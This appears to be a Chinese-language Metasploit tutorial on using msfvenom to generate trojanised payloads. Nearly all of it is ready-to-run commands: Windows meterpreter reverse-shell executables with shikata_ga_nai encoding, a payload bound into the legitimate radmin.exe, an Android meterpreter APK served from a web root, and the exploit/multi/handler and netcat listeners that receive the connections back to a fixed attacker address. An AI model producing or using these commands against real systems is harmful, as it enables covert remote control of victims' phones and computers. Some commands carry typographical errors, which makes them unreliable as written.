6.Metasploit生成apk攻击Android实例
Metasploit进阶第四讲 生成Android apk文件
01 msfvenom基本参数
msfvenom介绍
承接上回,staged/unstage payload如何利用?
msfvenom是msfpayload及msfencode的结合体,可利用msfvenom将payload封装为木马程序,并在目标机上执行,在本地监听上线。
msfvenom基本参数
msfvenom -h
-p ->指定payload
-1 ->列出所有可用项
-f ->指定文件输出格式
-e ->指定编码格式
-a ->选择架构平台
-o ->选择文件输出路径,包含文件名
-s ->指定生成的payload最大大小
-b ->避免使用的字符
-I ->指定编码次数
-c ->添加自己的shellcode
-xxxx.exc -k ->捆绑文件到xxx.cxc
以下使用msfvenom分别是什么意思?
Msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545
-e x86/shikata_ga_nai –I 3 –f exe -o abc.exe
Msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545
-b ‘\×00xff' –I 3 –f exe -o abc.exe
Msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545
-e x86/shikata_ga_nai –k –x /usr/share/windows-binaries/radmin.exe –f exe -o radmin.exe
msfvenom生成apk文件
staged payload:
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545
R>/var/www/html/Lliang.apk
metasploit:
use exploit/multi/handler 加载模块
set payload android/meterpreter/reverse_tcp 选择Payload
set LHOST10.1.1.169这里的地址设置成我
们刚配置木马的IP地址
set LPORT4545这里的端口设置成刚才我们
配置木马所监听的端口
unstage payload:
msfvenom –p windows/shell_reverse_tcp LHOST=10.1.1.169 LPORT=4545
-f exe –o /var/www/html/shell-stageless.exe
metasploit:
use exploit/multi/handler加载模块
set payload windows/shell_reverse_tcp 选择Payload
unstage payload:
msfvenom -p windows/shell reverse_tcp LHOST=10.1.1.169 LPORT=4545 -f exe -o /var/www/html/shell-stageless.exe
netcat:在两台电脑之润建立链接并返回两个数据流
nc -lyp 4545 -监听4545端口
-v/-vw 显示指令执行过程
-l 使用监听模式,管控传入的资料
-p 设置本地主机使用的通信端口
staged payload不适用于netcat,必须使用Metasploit的exploit/multi/handler模块。要从主机上的metasploit handler上下载完整的payload